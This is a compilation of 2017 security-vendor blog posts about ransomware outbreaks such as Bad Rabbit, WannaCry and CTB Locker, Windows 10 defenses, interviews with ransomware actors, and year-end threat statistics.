In October, another sophisticated ransomware reared its ugly head: Bad Rabbit ransomware (Ransom:Win32/Tibbar.A) infected devices by posing as an Adobe Flash installer available for download on compromised websites. Similar to WannaCry and Petya, Bad Rabbit had spreading capabilities, albeit more traditional: it used a hardcoded list of user names and passwords. Like Petya, it can also render infected devices unbootable, because, in addition to encrypting files, it also encrypted entire disks.

On Windows 7 devices, several security solutions technologies can block the download and installation of the ransomware, but protecting the device from the damaging payload and from infecting other computers in the network can be tricky.

With Windows 10, however, in addition to stronger defense at the infection vector, corporate networks were safer from this damaging threat because several technologies are available to stop or detect Bad Rabbits attempt to spread across networks using exploits or hardcoded user names and passwords.

More importantly, during the Bad Rabbit outbreak, detonation-based machine learning models in Windows Defender AV cloud protection service, with no human intervention, correctly classified the malware 14 minutes after the very first encounter. The said detonation-based ML models are a part of several layers of machine learning and artificial intelligence technologies that evaluate files in order to reach a verdict on suspected malware. Using this layered approach, Windows Defender AV protected Windows 10 devices with cloud protection enabled from Bad Rabbit within minutes of the outbreak.

Figure 4. Windows 7 and Windows 10 platform defenses against Bad Rabbit

As these outbreaks demonstrated, ransomware has indeed become a highly complex threat that can be expected to continue evolving in 2018 and beyond. The multiple layers of next-generation security technologies on Windows 10 are designed to disrupt the attack methods that we have previously seen in highly specialized malware but now also see in ransomware.

Ransomware protection on Windows 10

For end users, the dreaded ransom note announces that ransomware has already taken their files hostage: documents, precious photos and videos, and other important files encrypted. On Windows 10 Fall Creators Update, a new feature helps stop ransomware from accessing important files in real-time, even if it manages to infect the computer. When enabled, Controlled folder access locks down folders, allowing only authorized apps to access files.

Controlled folder access, however, is but one layer of defense. Ransomware and other threats from the web can be blocked by Microsoft Edge, whose exploit mitigation and sandbox features make it a very secure browser. Microsoft Edge significantly improves web security by using Windows Defender SmartScreens reputation-based blocking of malicious downloads and by opening pages within low-privilege app containers.

Windows Defender Antivirus also continues to enhance defense against threats like ransomware. Its advanced generic and heuristic techniques and layered machine learning models help catch both common and rare ransomware families. Windows Defender AV can detect and block most malware, including never-before-seen ransomware, using generics and heuristics, local ML models, and metadata-based ML models in the cloud. In rare cases that a threat slips past these layers of protection, Windows Defender AV can protect patient zero in real-time using analysis-based ML models, as demonstrated in a real-life case scenario where a customer was protected from a very new Spora ransomware in a matter of seconds. In even rarer cases of inconclusive initial classification, additional automated analysis and ML models can still protect customers within minutes, as what happened during the Bad Rabbit outbreak.

Windows 10 S locks down devices from unauthorized content by working exclusively with apps from the Windows Store and by using Microsoft Edge as the default browser. This streamlined, Microsoft-verified platform seals common entry points for ransomware and other threats.

Reducing the attack surface for ransomware and other threats in corporate networks

For enterprises and small businesses, the impact of ransomware is graver. Losing access to files can mean disrupted operations. Big enterprise networks, including critical infrastructures, fell victim to ransomware outbreaks. The modern enterprise network is under constant assault by attackers and needs to be defended on all fronts.

Windows Defender Exploit Guard locks down devices against a wide variety of attack vectors. Its host intrusion prevention capabilities include the following components, which block behaviors commonly used in malware attacks:

  • Attack Surface Reduction (ASR) is a set of controls that blocks common ransomware entry points: Office-, script-, and email-based threats that download and install ransomware; ASR can also protect from emerging exploits like DDEDownloader, which has been used to distribute ransomware
  • Network protection uses Windows Defender SmartScreen to block outbound connections to untrusted hosts, such as when trojan downloaders connect to a malicious server to obtain ransomware payloads
  • Controlled folder access blocks ransomware and other untrusted processes from accessing protected folders and encrypting files in those folders
  • Exploit protection (replacing EMET) provides mitigation against a broad set of exploit techniques that are now being used by ransomware authors

Additionally, the industry-best browser security in Microsoft Edge is enhanced by Windows Defender Application Guard, which brings Azure cloud grade isolation and security segmentation to Windows applications. This hardware isolation-level capability provides one of the highest levels of protection against zero-day exploits, unpatched vulnerabilities, and web-based malware.

For emails, Microsoft Exchange Online Protection (EOP) uses built-in anti-spam filtering capabilities that help protect Office 365 customers against ransomware attacks that begin with email. Office 365 Advanced Threat Protection helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection.

Integrated security for enterprises

Windows Defender Advanced Threat Protection allows SecOps personnel to stop the spread of ransomware through timely detection of ransomware activity in the network. Windows Defender ATPs enhanced behavioral and machine learning detection libraries flag malicious behavior across the ransomware attack kill-chain, enabling SecOps to promptly investigate and respond to ransomware attacks.

With Windows 10 Fall Creators Update, Windows Defender ATP was expanded to include seamless integration across the entire Windows protection stack, including Windows Defender Exploit Guard, Windows Defender Application Guard, and Windows Defender AV. This integration is designed to provide a single pane of glass for a seamless security management experience.

With all of these security technologies, Microsoft has built the most secure Windows version ever with Windows 10. While the threat landscape will continue to evolve in 2018 and beyond, we dont stop innovating and investing in security solutions that continue to harden Windows 10 against attacks. The twice-per-year feature update release cycle reflects our commitment to innovate and to make it easier to disrupt successful attack techniques with new protection features. Upgrading to Windows 10 not only means decreased risk; it also means access to advanced, multi-layered defense against ransomware and other types of modern attacks.

 

Tanmay Ganacharya (@tanmayg)
Principal Group Manager, Windows Defender Research

 

*Edited 01/11/2018 to remove the statement “Windows 10 has a much larger install base than Windows 7“.

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

 

Ransomware: Screen Lockers vs. Encryptors

It’s December 1989, and Joseph L. Popp, an American evolutionary biologist from Harvard, walks into his local post office carrying a large stack of envelopes stamped “PC Cyborg Corporation”. He carefully slides each one into the “Outgoing” slot. Finished, Popp exits the post office, unaware he’s just kickstarted one of the most lucrative cybercrime activities of the 21st century: ransomware.

A continent away, a female researcher at the World Health Organizations opens one of Popp’s envelopes. Inside is a 5 ¼-inch floppy disk with instructions to carry out a research survey to test the risks of contracting AIDS. Excited, she inserts the disk expecting to see cutting-edge research into a virus currently plaguing the world.
Instead, she’s receives to a computer virus.

The computer display reads, “Restart your computer now.” She shuts her PC down and reboots. Nothing. “Turn on your printer,” the computer suddenly demands. The printed paper exits inch by inch, finally revealing a ransom note demanding $189 for a “licensing fee” in exchange for a decryption key. The money is to be mailed to a P.O. box in Panama. If the money is not sent, then decades of research data will be deleted.

Joseph Popp mailed 20,000 of these envelopes to 90 countries around the globe before the FBI captured him at his parents’ home in Ohio. Fearful of the breach, some researchers preemptively deleted decades worth of data, even though Popp’s crude ransomware was later easily defeated by computer techs. One Italian AIDS organization reportedly lost 10 years of work.

Popp’s story is the first ransomware attack, and it illustrates how cybercriminals pray on our hopes and fears. The Harvard biologist’s malware bares little resemblance to today’s strains. In just three decades, ransomware has gone from post office packages to self-replicating, viral monsters capable of infecting hundreds of thousands of computers around the world.

Today, ransomware attacks are on the rise. A recent Verizon study shows a 50 percent increase in 2017 alone. Ransomware is popular among crybercriminals because it’s the most profitable malware in existence today.

Ransomware works just like a real-life hostage situation. Someone kidnaps your data and demands money. There are two basic types of ransomware: encryptors and screen lockers.

Encryptors infect your devices and turn your data into unreadable $&@%#* gibberish. Screen lockers shut off access to your computer by taking over the operating system. They deny access to the data but don’t encrypt it.
If you know which type of ransomware you’re dealing with, you have a better chance of getting your money back.

Screen Lockers

Ransomware works for one simple reason — it attacks our emotions. The fear of losing your family photos or that novel you’ve been working on is palpable. Fear is what gives cyberthieves the power to manipulate. Here are some common ransomware scams and screen lockers.

Metropolitan Police scam

As you’re scrolling through your Facebook feed, a pop-up window appears out of nowhere. It has an official looking coat of arms next to the words “METROPOLITAN POLICE” in all caps, so you know it’s serious business. The message below reads: “You are accused of viewing/storage and/or dissemination of banned pornography (child pornography/zoophilia/rape etc.)”.

After a slight pause to consider what the “etc.” might be, your backbone drops 50 degrees and a knot forms in your gut. You make a hasty mental run through the last websites you’ve visited.

Disgusted at the accusation, you maneuver your cursor to the close the window but nothing happens. Your computer is locked, and the only way to unlock it is to pay a “$300 fine” for your alleged digital indiscretions. Now, a live video feed suddenly pops up. On your laptop screen, you now see your own face staring back at you. You’re horrified. Someone has hacked your webcam and is spying on you. Welcome to the Metropolitan Police ransomware attack.

How did this happen? Many types of ransomware infect systems through phishing emails. Hackers use false accusations, threats of incarceration, and voyerism to motivate victims into paying ransoms. Many infections come from phishing emails that trick users into visiting malicious websites or downloading infected attachments.

Should you start packing for a trip to prison? No. The Metropolitan Police attack is a scam and doesn’t directly threaten your data through encryption. The only malware you have on your computer is the script running the pop-up window and accessing your computer. Nevertheless, the ransomware is effective at intimidating people enough to pay the “fine”. Never pay the ransom. Instead, download antivirus removal software.

FBI MoneyPak scam

The FBI MoneyPak scam is a variation on the Metropolitan Police attack and uses the same types of intimidations. The pop-up looks like an official FBI notice, warning users they’ve infringed copyright laws by illegally downloading files like MP3s, movies, and software. Although the FBI MoneyPak doesn’t hijack your webcam, it does deploy a similar scare tactic, claiming authorities can identity you through your IP address.

Cyberthieves demand payment of the ransom through the online wallet service MoneyPak, a competitor to other sites like PayPal or Serve. Hackers may also require a prepaid debit card. Again, the MoneyPak attack is a scam, not a legitimate ransomware attack that threatens your data.

Protect yourself from these types of scams by enabling automatic updates for your operating systems.

Encryptors

Recent cybersecurity studies show encryptors as the most effective forms of ransomware today. Hackers are developing more sophisticated forms of encryptors, which are not only harder to detect but are capable of replicating themselves. Unlike basic screen lockers, encryptors do threaten your data.

CryptoLocker

Inspired by viruses like the Metropolitan Police scam, hackers have developed data-threatening ransomware like CryptoLocker, which hijacks users’ documents and gives the victim 72 hours to pay the ransom. To kick up the drama, an ominous clock is included with CryptoLocker that begins a countdown to data doomsday.

CrytoLocker infections come from an email containing ZIP files and passwords for activation. When you open the email and enter the password, a trojan virus is deployed on your system and begins encrypting your hard drive. The hacker then makes a private key that becomes the only access to decrypting the data. If you don’t pay the ransom, the key is destroyed and the data stays encrypted.

Keep your data out of hackers’ hands by taking away their power to destroy it. Keep your data backed up in a separate drive or in the cloud.

WannaCry Attacks

On Friday, May 12th, 2017, North Korea launched an enormous ransomware attack that spread around the globe. The WannaCry attacks of 2017 were the world’s most widespread and destructive ransomware attack to date — infecting more than 230,000 computers in 150 countries. The hackers required a $300 ransom payment, a clear signal they were targeting small businesses, organizations, and individuals.

WannaCry ransomware is feared in cybersecurity circles for its ability to self-replicate. WannaCry doesn’t need you to open an email or download an attachment from a website. It replicates through a worm virus, sending copies of itself throughout the internet.

WannaCry gains entry through vulnerabilities in your operating system and takes over your computer, encrypting your data and demanding a ransom. Like most data-destructive ransomware, by the time users discover they’re infected, it’s too late.

Ransomware has become exponentially more sophisticated and destructive since Joseph Popp snail mailed his infected floppy disks. Analog delivery methods have given way to more autonomous forms as cyberthieves mix and match malware characteristics to create new strains. In June of 2017, cybersecurity experts discovered a new form of ransomware called Petya, which includes features of both screen lockers and encryptors. If you’re worried about ransomware, protecting yourself is fairly simple. Follow tips for avoiding ransomware and invest in comprehensive antivirus software.

Download your Antivirus

The post Ransomware: Screen Lockers vs. Encryptors appeared first on Panda Security Mediacenter.

December 2017: The Month in Ransomware

Ransomware activity was on a fairly high level till mid-December but slowed down by the end of the month, perhaps due to threat actors’ holiday spree. Some of the newsmaking events included the onset of the first-ever blackmail virus targeting network-attached storage devices, the breach of California’s voter database, and arrests of CTB-Locker and Cerber […]… Read More

The post December 2017: The Month in Ransomware appeared first on The State of Security.

3 Malware Trends to Watch Out for in 2018

We already know the security industry witnessed several significant ransomware attacks in 2017. Some of these campaigns derived at least part of their success from recent developments among malware families more generally. These trends will no doubt continue to shape bad actors’ offensives and how defenders can hope to protect against them in 2018. Digital […]… Read More

The post 3 Malware Trends to Watch Out for in 2018 appeared first on The State of Security.

Be Unhackable: Here’s Your Post-Holiday Gift Safety Checklist

‘Twas the night after Christmas, when all through the house
All the smart toys were buzzing and beeping about,
The chargers were plugged near the chimney with care,
Without a clue that the hackers soon would be there.

With the height of the season now behind us, you may be experiencing a bit of a holiday hangover. But as you wade through the holiday fallout of wrapping paper, instruction manuals, batteries packs, and downloads, don’t forget that the most important step to your family enjoying its cache of digital gifts is protecting them.

McAfee’s Most Hackable Toys  2017 survey revealed our shared habits of connectivity minussolid safeguards. What we know: While most of us realize the importance of protecting our internet-connected devices, we aren’t too concerned with making device security a priority.

So, now that you’ve purchased that new smartphone, drone, smart toy, or appliance, take that next simple step to secure your expanding digital home. Here’s a short, post-holiday checklist to help get you started.

Smart Gift Checklist

Settings, passwords, software. Once you’ve powered up your new device: 1) Make sure it’s password protected with tw0-step authentication. 2) Set a pin or passcode to lock your device. 3) Install the latest software versions as soon as possible and update them regularly. 4) Protect your new devices with additional security software if possible. 5) Avoid downloading suspicious apps and never click on strange links that arrive via email, messenger, or text. 6) And here’s a biggie: If you are selling, donating, or recycling your old devices, make sure you wipe them clean.

Research the risks. According to the same McAfee study, some of the most popular digital gifts of 2017 include tablets, smartphones, drones, digital assistants, and connected toys and appliances — all of which come with inherent security risks. With the growing list smart devices, hackers have a million new entryways into our homes. Google the name and model of your new gift and read about possible security holes. Another valuable resource is online reviews posted by people who have encountered security issues.

‘Take Five’ before having fun. Securing a new gift often takes five minutes, but it’s a must in today’s wired world. Go into your new product’s privacy settings and change manufacturer settings and set a new password. Keep the process simple and allow your kids to do it alongside you so that device security is more likely to become a habit.

Don’t be duped by cute. From fuzzy talking puppies to adorable dolls, toys can also carry massive security risks. It’s important to research if there have been any reported security vulnerabilities with toys you’ve purchased or have been gifted, so you know how to secure them. Don’t let a toy’s appearance lull you into a false sense of security. Remember: It may look like a kitty cat, but if it connects to the world wide web, then it’s a computer that could be transmitting data to a remote server. When using connected toys: 1) Use toys in places with trusted and secured wi-fi. 2) Monitor your child’s activity with the toys (such as conversations and voice recordings) through the toy’s partner parent application, if available. 3) Take time to read the toy’s disclosures and privacy policies.

Refresh passwords on your home network. Secure all of your connected devices and your home internet at its source — the network. Avoid routers that come with your ISP (Internet Security Provider) since they are often less secure. And, make it a point to change your passwords regularly.

It’s impossible to protect against all risks, but you can frustrate a hacker’s plans by putting up some security obstacles. Even though security and privacy risks come with our new gifts, it’s clear that the demand for faster, better, more impressive digital products is here to stay. Taking the time to boost your family’s security will help make sure this holiday remains a happy one into the New Year and beyond.

The post Be Unhackable: Here’s Your Post-Holiday Gift Safety Checklist appeared first on McAfee Blogs.

Two Romanians Charged With Hacking Police CCTV Cameras Before Trump Inauguration

Remember how some cybercriminals shut down most of Washington D.C. police's security cameras for four days ahead of President Donald Trump's inauguration earlier this year? Just a few days after the incident, British authorities arrested two people in the United Kingdom, identified as a British man and a Swedish woman, both 50-year-old, on request of U.S. officials. But now US federal court

The Year Cybersecurity Made Primetime

Grey-Sloan Memorial Hospital, the fictional hospital on the television drama “Grey’s Anatomy,” was suddenly brought to a halt Nov. 14 at the hands of ransomware. The No. 3 drama on broadcast television, a venerable franchise of 14 seasons and 300 episodes, reflected the harsh reality faced by many. WannaCry, Petya, and Equifax entered dinner table conversation and late-night talk show monologues. In 2017 cybercrime made primetime.

Shonda Rhimes, creator of “Grey’s Anatomy,” tweets about ransomware hits Grey-Sloan Memorial

The events that transpired this year put cybersecurity on everyone’s mind. The stories of ransomware and malware found their way into homes, schools, and businesses – everyday life.

The Attacks That Changed Everything

In May, the ransomware WannaCry took center stage. True to its name, WannaCry was worth its weight in tears: 150 countries impacted, 250,000 machines infected, 16 United Kingdom medical centers taken down, all in just one day. The ransom was paid, and expert analysis ensued. The motive: disruption. As Raj Samani, Chief Scientist at McAfee stated: “The game has changed. The reality is that any organization can hire someone to disrupt a competitor’s business operations for less than the price of a cup of coffee.”

Taking cues from WannaCry, the Petya/NotPetya malware emerged a month later as its successor. The next global cyberattack leveraged the same vulnerability, but was nastier when infecting systems. Instead of locking away files and extorting money from victims, Petya/NotPetya was a wiper – deleting all files from affected devices.

The threat landscape was not just populated by cyberattacks, but also a data breach deemed the worst in recent memory. The Equifax breach exposed crucial personal identification of roughly 143 million consumers in the United States. This data included names, addresses, birthdates, driver’s license data and Social Security numbers. “We need to view the Equifax breach as a catalyst moment for rethinking the way we handle identification for U.S. citizens,” said Steve Grobman, senior vice president and chief technology officer for McAfee.

Rethink we did. These attacks, and other notable ones such as Bad Rabbit, the Uber data breach, the KRACK Wi-Fi attack, and more, changed how the cybersecurity industry responds to threats.

Cause and Effect

These attacks moved the needle. Cybercriminals were upping their game. These attacks mandated that cybersecurity must be faster, smarter, and more effective. Christiaan Beek, lead scientist and principal engineer at McAfee, says our improved response time to ransomware attacks confirms that’s happening: “The cybersecurity world is indeed responding faster than before, especially after WannaCry, which was another wake-up call… The moment researchers see that a decryptor is available, we go on and continue to hunt down the next one or learn from the previous ones and start innovating or fine-tuning our products.”

Looking Ahead

Now that cybersecurity is on prime time, what happens? We’re paying attention. Does that mean we’re prepared?

McAfee Chief Executive Officer Chris Young thinks we still have a ways to go. “It’s nearly 2018. And from the discussions I have weekly, it’s clear that business leaders understand far more about the risk of cyber threats today than they did even a few years ago. However, so many business leaders I talk to still want to know if they’re doing everything they can to protect their companies. Answer: They’re not.”

Young recommends a “Culture of Security” –– a paradigm shift in philosophy and approach from the executive boardroom to new employees on their first day. Leaders must demonstrate a new priority, whether it’s impeccable password and virtual private network use, or cloud computing adoption only under the guidance of cybersecurity professionals. “Businesses need to think security first,” Young says. “Whether that’s in designing new products and services, signing partnership agreements, in hiring new employees, or anything else.”

Malware is not the star of the show. It’s the villain, but a powerful one. Cybersecurity must adapt to address it. McAfee wrapped up 2017 by announcing the upcoming acquisition of cloud provider Skyhigh Networks, which will become part of the McAfee Cloud Security Business Unit. Skyhigh will join a McAfee portfolio that includes market-leading products in the endpoint and security operations center (SOC). Partnering in an open ecosystem pulls these major strengths together in a new and agile way.

Welcome, 2018. New tools and a new “Culture of Security” are ready to take on new threats.

The post The Year Cybersecurity Made Primetime appeared first on McAfee Blogs.

McAfee Labs Advanced Threat Research Aids Arrest of Suspected Cybercrime Gang Linked to Top Malware CTB Locker

In our recent research, we interviewed the actors behind ransomware campaigns. One of the interesting findings was cybercriminals seemed to have a sense of absolute safety when conducting criminal operations. Cybercrime is an area of crime like no other, perceived as low-risk with high returns, which contributes greatly to its rapid growth.

Today, with the arrest of individuals suspected of infecting computer systems by spreading the CTB Locker malware, a clear message has been sent—involvement in cybercrime is not zero-risk.

CTB Locker

CTB Locker, also known as Critroni, is known as one of the largest ransomware families—helping to drive a new ransomware surge of 165 percent in 2015 as one of the top three ransomware families, and earning a spot as No. 1 just a year later. Operation Tovar, in which law enforcement agencies took down the infrastructure responsible for spreading CryptoLocker, created a need for more malware—CTB Locker and CryptoWall malware families helped to fill the gap.

In June 2014, the CTB Locker authors began to advertise the malware family on the underground scene at a cost of $3,000USD, where people could buy the first versions for $1,500USD. The authors also offered an affiliate program, which made CTB Locker infamous. By sharing a percentage of the received ransoms, the affiliates ran the greater risk—because they had to spread the ransomware—but they also enjoyed the higher profits. By using exploit kits and spam campaigns, the malware was distributed all over the world, mostly targeting “Tier 1” countries, those in which the victims could afford to pay and most likely would pay the ransom. Midway through 2015, we gained unique information from an affiliate server that helped us tremendously in the subsequent investigations.

A CTB Locker affiliate server.
An example of CTB Locker source code.

Besides the use of an affiliate server in CTB Locker’s infrastructure, two other components complete the setup: a gateway server and a payment server.

Attacks Begin to Grow

During 2016, a massive spam campaign struck the Netherlands. Emails in Dutch seemed to originate from one of the largest telco providers. The emails claimed to have the latest bill attached. There was no bill, of course, rather CTB Locker asking for around $400USD of ransom to return files. The grammar and word usage was near perfect—not what we commonly observe—and the names in the email were proof of a well-prepared campaign. More than 200 cases in the Netherlands alone were filed with regards to these infections.

With attacks growing in number, the Dutch High Tech Crime Unit began an investigation. The unit approached McAfee’s Advanced Threat Research team to assist in identifying samples and answering questions.

Following our research, we were kept updated and were informed that in the early morning of December 14 operation “Bakovia” started. The initial research was on the CTB Locker ransomware but based on information from the U.S. Secret Service, it was determined that the same suspected gang was also linked to distribution of Cerber ransomware—another major family.

The Arrests

During the operation in East Romania, six houses were searched whereby the investigators seized a significant amount of hard-drives, laptops, external-storage, crypto-currency mining rigs, and hundreds of SIM cards. Suspects were arrested for allegedly spreading CTB Locker ransomware, and other suspects allegedly responsible for spreading Cerber were arrested at the airport in Bucharest.

Watch video of arrests. 

The law enforcement action emphasizes the value of public-private partnerships and underscores the determination behind the McAfee mantra “Together is power.”

The post McAfee Labs Advanced Threat Research Aids Arrest of Suspected Cybercrime Gang Linked to Top Malware CTB Locker appeared first on McAfee Blogs.

Imperva’s Top 10 Blogs of 2017

I recently took a step back to review all the content we shared in 2017 on the Imperva blog. We covered a broad range of topics including data security, cloud migration, application and API security, AI and machine learning, cybersecurity research, GDPR, insider threats and more. We were busy! Cybersecurity certainly held the world’s attention in 2017.

Several stories rose to the top as either most read by you, particularly relevant to today’s cybersecurity industry or exceptionally newsworthy (and in some cases, all of the above). For an end-of-year reading shortlist, I’ve compiled our top 10 blog posts from 2017.

1. What’s Next for Ransomware: Data Corruption, Exfiltration and Disruption

The WannaCry ransomware attack caught everyone off guard, infecting more than 230,000 computers in 150 countries by encrypting data on networked machines and demanding payments in Bitcoin. We wrote about how to protect against it, but our post on what’s next for ransomware garnered even more attention—it was our most read post of the year.

2. CVE-2017-5638: Remote Code Execution (RCE) Vulnerability in Apache Struts

Apache Struts made headlines all over the place in 2017. The vulnerability we wrote about in March hit it big and just kept on going. You might remember it reared its ugly head later in the year when it was tied to the Equifax breach. (We also wrote about two other Apache Struts vulnerabilities: CVE-2017-9791 and CVE-2017-9805.)

3. Top Insider Threat Concern? Careless Users. [Survey]

We surveyed 310 IT security professionals at Infosecurity Europe in June on their thoughts on insider threats. The big reveal? More than half (59 percent) were concerned not primarily about malicious users, but about the careless ones who unwittingly put their organization’s data at risk.  (We shared more about insider threats in this infographic.)

4. Uncover Sensitive Data with the Classifier Tool

In July we launched Classifier, a free data classification tool that allows organizations to quickly uncover sensitive data in their databases. The response was immediate—over 500 downloads and counting—not surprising given it helps jump start the path to compliance with the GDPR. Our blog post walked through the steps of how to use the tool.

5. Professional Services for GDPR Compliance

Speaking of the GDPR, the new data protection regulation coming out of the EU was on everyone’s radar this year. We wrote a LOT about GDPR, including who is subject to the regulationwhat rules require data protection technology, and the penalties for non-compliance. However, our post on the professional services we offer for GDPR compliance drove the most traffic on this topic by far.

6. The Evolution of Cybercrime and What It Means for Data Security

Hackers tactics may change, but what they’re after doesn’t—your data. Stealing or obstructing access to enterprise data is the foundation of the cybercrime value chain. We discussed how the changing nature of cybercrime and app and data accessibility create risk and the essentials of application and data protection in this ever-changing world.

7. Move Securely to the Cloud: WAF Requirements and Deployment Options

Moving to the cloud has become an overwhelmingly popular trend even among those who were at first reluctant to make the move. In this post, we discussed requirements and deployment options for evaluating a WAF for the cloud.  (We also wrote about the benefits of a hybrid WAF deployment and the pros and cons of both cloud and on-prem WAFs.)

8. Clustering and Dimensionality Reduction: Understanding the “Magic” Behind Machine Learning

Everywhere you turned in 2017 you heard about AI and machine learning and the impact they’re having, or will have, on essentially everything. Two of Imperva’s top cybersecurity researchers explained in detail some of the techniques used in machine learning and how they’re applied to solve for identifying improper access to unstructured data. (Those two researchers were also awarded a patent for their machine learning work this year!)

9. Can a License Solve Your Cloud Migration Problem?

Gartner published their 2017 Magic Quadrant for Web Application Firewalls (WAF) in August and Imperva was once again named a WAF leader, making it four consecutive years. We stood out for offering security solutions for today’s changing deployment and infrastructure model. In this post we wrote about our flexible licensing program, which lies at the core of the move to the cloud: helping customers secure apps wherever they need, whenever they need, for one price.

10. The Uber Breach and the Case for Data Masking

Last but not least, we couldn’t ignore the Uber breach. Hard to believe in today’s world that log in credentials were shared in a public, unsecured forum, but that’s what happened. The breach did highlight an important issue, that of production data being used in development environments. It’s a bad idea; we explained why in this post. Had data masking been used at Uber, hackers would have been left with worthless data, or as we called it, digital fools gold.

Looking Into the World of Ransomware Actors Reveals Some Surprises

During the preparations for our keynotes at McAfee’s recent MPOWER conference, we brainstormed a few topics we wanted to share with the audience. Ransomware was definitely on our agenda, but so much has already been said and written on the subject. What could we add that would be interesting?

We hit on the angle: to dive into this shady world and learn about the people behind these campaigns. There are several ways to approach this. We could go into forums and look for the individuals who discuss these campaigns or offer ransomware for sale. But that would be very time consuming and the chance of finding the right individuals would be small. There is a better way.

In most samples of ransomware, once they malware executes and files are encrypted, the “ransom note” appears. Either a background drop or a text file contains the details. During 2017 we saw many of these notes contain an email address for questions or for payment details and releasing files.

Example:

We looked at three months of unique ransomware samples and extracted either the images or the notes that contained the contact addresses. As new ransomware families popped up in our tracker, we verified them and added the addresses—because these fresh attacks made it likely the authors would interact with us.

But how could convince the actors to answer our questions? We took the role of students working on a master thesis and asked the actors if they would be willing to answer a few questions. For a couple of weeks we lived the role of students, eating lots of pizza, drinking sodas, and so on. (You have to live the role, right?)

We sent our emails and queried the actors who responded. One of our first observations was that of all the emails we retrieved, about 30 percent were either fake or nonexistent. So in these cases when files were encrypted and the victim decided to pay, using email to send evidence of payment was useless. The money was gone (as well as the files).

During the first week of our research we received answers back from some of the actors, but most were not willing to cooperate. That’s no surprise: They were cautious about revealing their identity.

During the second week, we had better luck and started to chat with a few. That number grew, and after a few weeks we had a great collection of conversations with the actors.

“Fast, easy, and safe”

When we asked why they started a career in ransomware, most answered with variations on “enough money” and “fast, easy, and safe,” especially when using anonymous email services and cryptocurrency for payments.

Homemade vs. Off the Shelf

Most of the actors we spoke with wrote their own ransomware. They had looked at the published source code but were clever enough to come up with their own variants that contained new techniques or different approaches to keep detections low. The longer they stayed out of sight of endpoint security solutions, the longer was their opportunity to make money.

Spending Their Ill-Gotten Gains

They spend the revenue they gained from their campaigns in various manners: travel, cars. One had many affiliates working for him so he was soon going to buy a house. One of the most surprising answers was that one turned to ransomware to “pay off his debts.”

Willing to Negotiate

Although they often have the image of being ruthless, almost all of them claimed a willingness to negotiate the ransom price in case victims could not afford to pay the demanded amount.

Tracking the Authors

One of the actors so enthusiastic he wanted to sell us ransomware code so we could pay off our college debts. Based on his answers and sharing of information, we noticed that he was not a very experienced actor and he gave clues on his whereabouts. In one of the conversations, he shared some examples, but the data was not scrubbed. By correlating the data he provided with other information, such as email time zones and mistakes in his English, we traced him to Dakar, Senegal. He not only sends ransomware but also sells botnets and other fraud-related services.

We found the research eye opening. Now we just need a few weeks in the gym to work off all the sodas and pizzas.

For those suffering from a ransomware attack, you have three options. The first two are bad: lose your files, or pay the ransom and hope (with no guarantee) for a key to unlock your files. The best option is to start with a visit to NoMoreRansom.org to see if a decryption tool is available.

Meanwhile, remember the standard advice on reducing your risk of picking up ransomware: Keep your OS, security, and application software up to date; exercise a healthy dose of skepticism even when you see messages that appear to come from legitimate sources; and do not click on links or open files from unknown names or organizations.

 

Learn more about the threat statistics we gathered in Q3, including ransomware in the McAfee Labs Threats Report, December 2017 and follow the team on Twitter at @McAfee_Labs.

The post Looking Into the World of Ransomware Actors Reveals Some Surprises appeared first on McAfee Blogs.

McAfee Labs Reports All-Time Highs for Malware in Latest Count

In the third quarter of 2017, McAfee Labs reports all-time highs of new and total malware. What is causing the increasing numbers of malware that are submitted to us at an average rate of four new malware samples per second?

One major trend that continues in Q3 is the abuse of Microsoft Office–related exploits and the use of malicious code in macros that activates PowerShell to execute them, so-called fileless attacks.

In March, an exploit was released that took advantage of CVE-2017-0199, a vulnerability in how Microsoft Office and WordPad handle specially crafted files that could result in remote code execution. During Q3, we saw an increase in the number of crafted files that were submitted. We also noticed that many releases take advantage of a toolkit on GitHub that makes it quite easy to create a “backdoor” attack:

Another major event in Q3 was a massive spam campaign to distribute a new version of the infamous Locky ransomware “Lukitus.” Within 24 hours, more than 23 million emails were sent. Shortly after the first arrived, security company Comodo Labs discovered another campaign related to this attack that sent more than 62,000 spam emails distributing the ransomware.

With banking Trojans, we observed the greatest activity from the Trickbot Trojan. We saw several variations in which the actors added new features to their code, for example, cryptocurrency stealing, embedding the EternalBlue exploit, and employing different ways of delivering the malware, which primarily targets the financial sector.

Another banking Trojan family that appeared often during the quarter was Emotet. In several spamming campaigns users were asked to download a Microsoft Word document from several locations. From our analysis of the attached document, we found the payload was hidden in the macros that used PowerShell to install the Trojan.

These major campaigns and others caused a tsunami of spam email, distributing a tremendous number of samples that increased the malware storage demands of all of us in the security industry.

For more details and our usual statistics on malware, breach incidents, and web and network threats, read the McAfee Labs Threats Report, December 2017.

The post McAfee Labs Reports All-Time Highs for Malware in Latest Count appeared first on McAfee Blogs.

Kaspersky Security Bulletin. Overall statistics for 2017

All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.

The year in figures

  • 4%of user computers were subjected to at least one Malware-class web attack over the year.
  • Kaspersky Lab solutions repelled 1 188 728 338 attacks launched from online resources located all over the world.
  • 199 455 606 unique URLs were recognized as malicious by web antivirus components.
  • Kaspersky Lab’s web antivirus detected 15 714 700 unique malicious objects.
  • 939 722 computers of unique users were targeted by encryptors.
  • Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 1 126 701 devices

 
Fill the form below to download the Kaspersky Security Bulletin 2017. Overall Statistics for 2017 full report (English, PDF):

Cybercriminals vs financial institutions in 2018: what to expect

Introduction – key events in 2017

2017 was a year of great changes in the world of cyberthreats facing financial organizations.

Firstly, in 2017 we witnessed a continuation of cyberattacks targeting systems running SWIFT — a fundamental part of the world’s financial ecosystem. Attackers were able to use malware in financial institutions to manipulate applications responsible for cross-border transactions, making it possible to withdraw money from any financial organization in the world, because SWIFT software is unified and used by almost all the major players in the financial market. Victims of these attacks included several banks in more than 10 countries around the world.

Secondly, in 2017 we saw the range of financial organizations that cybercriminals have been trying to penetrate, expand significantly. Different cybercriminal groups penetrated bank infrastructure, e-money systems, cryptocurrency exchanges, capital management funds, and even casinos. Their main goal was to withdraw very large sums of money.

